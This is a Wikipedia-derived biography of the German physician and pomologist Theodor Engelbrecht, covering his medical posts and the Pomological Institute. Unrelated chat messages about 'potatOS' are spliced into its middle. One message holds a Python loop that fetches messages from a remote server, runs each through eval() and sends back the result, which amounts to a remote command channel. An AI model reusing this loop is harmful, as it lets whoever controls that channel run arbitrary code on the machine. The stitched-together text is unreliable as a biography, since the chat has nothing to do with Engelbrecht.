Theodor Engelbrecht

Theodor Elias August Benjamin Engelbrecht (18 January 1813 – 4 August 1892) was a German physician and pomologist.[1][2]

Biography

He was born in Halchter near Braunschweig. He studied medicine at the University of Göttingen, and in 1844 was named a professor at the Surgical-Anatomical Institute in Braunschweig. In 1861 he received the post of medical officer of the Ducal Medical College.[2] In 1862 he induced the government to establish the Pomological Institute, and he was the first president of the German Pomological Society (1880–89). His principal work is Deutschland's Aepfelsorten ("Germany's apple varieties", 1889).

gollark: OmniDisks look up some random pastebin file.
gollark: Hmm, idea: what if I make `potatOS.update` just send an event to `potatoupd` instead of actually running the update routines itself?
gollark: Well, OmniDisks are revoked via the web license lookup thing.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```As you can see, this is much more portable than the old SPUDNET Python implementation, which needed websockets and asyncio and such.
gollark: I was thinking about this, but I don't actually have all the hashes of all the disks in circulation.

References

  1. Horst-Rüdiger Jarck; Günter Scheel, eds. (1996). Braunschweigisches Biographisches Lexikon – 19. und 20. Jahrhundert (in German). Hannover: Hahnsche Buchhandlung. pp. 164–165. ISBN 3-7752-5838-8.
  2. Heß, Wilhelm (1904). "Engelbrecht, Theodor". Allgemeine Deutsche Biographie (in German). Retrieved 10 October 2015.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.